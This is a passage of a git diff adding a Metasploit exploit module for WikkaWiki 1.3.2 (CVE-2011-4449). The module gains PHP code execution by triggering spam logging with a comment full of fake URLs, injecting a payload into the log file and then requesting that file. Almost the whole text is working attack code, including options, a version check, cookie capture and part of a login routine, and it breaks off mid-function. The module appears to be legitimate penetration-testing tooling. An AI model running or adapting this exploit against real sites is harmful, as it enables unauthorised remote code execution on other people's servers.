diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
new file mode 100644
index 0000000000..fa6f1f6c45
--- /dev/null
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -0,0 +1,235 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "WikkaWiki 1.3.2 Spam Logging PHP Injection",
+ 'Description' => %q{
+ This module exploits a vulnerability found in WikkaWiki. When the spam logging
+ feature is enabled, it is possible to inject PHP code into the spam log file, and
+ then request it to execute our payload. There are at least three different ways
+ to trigger spam protection, this module does so by generating 10 fake URLs in a
+ comment (by default, the max_new_comment_urls parameter is 6).
+
+ Please note that in order to use the injection, you must manually pick a page
+ first that allows you to add a comment, and then set it as 'PAGE'.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'EgiX', #Initial discovery, PoC
+ 'sinn3r' #Metasploit
+ ],
+ 'References' =>
+ [
+ ['CVE', '2011-4449'],
+ ['OSVDB', '77391'],
+ ['EDB', '18177'],
+ ['URL', 'http://wush.net/trac/wikka/ticket/1098']
+ ],
+ 'Payload' =>
+ {
+ 'BadChars' => "\x00"
+ },
+ 'DefaultOptions' =>
+ {
+ 'ExitFunction' => "none"
+ },
+ 'Arch' => ARCH_PHP,
+ 'Platform' => ['php'],
+ 'Targets' =>
+ [
+ ['WikkaWiki 1.3.2 r1814', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Nov 30 2011",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [true, 'WikkaWiki username']),
+ OptString.new('PASSWORD', [true, 'WikkaWiki password']),
+ OptString.new('PAGE', [true, 'Page to inject']),
+ OptString.new('TARGETURI', [true, 'The URI path to WikkaWiki', '/wikka/'])
+ ], self.class)
+ end
+
+
+ def check
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "#{target_uri.path}wikka.php?wakka=HomePage"
+ })
+
+ if res and res.body =~ /Powered by WikkaWiki/
+ return Exploit::CheckCode::Detected
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+
+ #
+ # Get the cookie before we do any of that login/exploity stuff
+ #
+ def get_cookie
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => "#{@base}wikka.php"
+ })
+
+ # Get the cookie in this format:
+ # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka
+ if res and res.headers['Set-Cookie']
+ cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+ else
+ raise RuntimeError, "#{@peer} - No cookie found, will not continue"
+ end
+
+ cookie
+ end
+
+
+ #
+ # Do login, and then return the cookie that contains our credential
+ #
+ def login(cookie)
+ # Send a request to the login page so we can obtain some hidden values needed for login
+ uri = "#{@base}wikka.php?wakka=UserSettings"
+ res = send_request_raw({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => cookie
+ })
+
+ # Extract the hidden fields
+ login = {}
+ if res and res.body =~ /\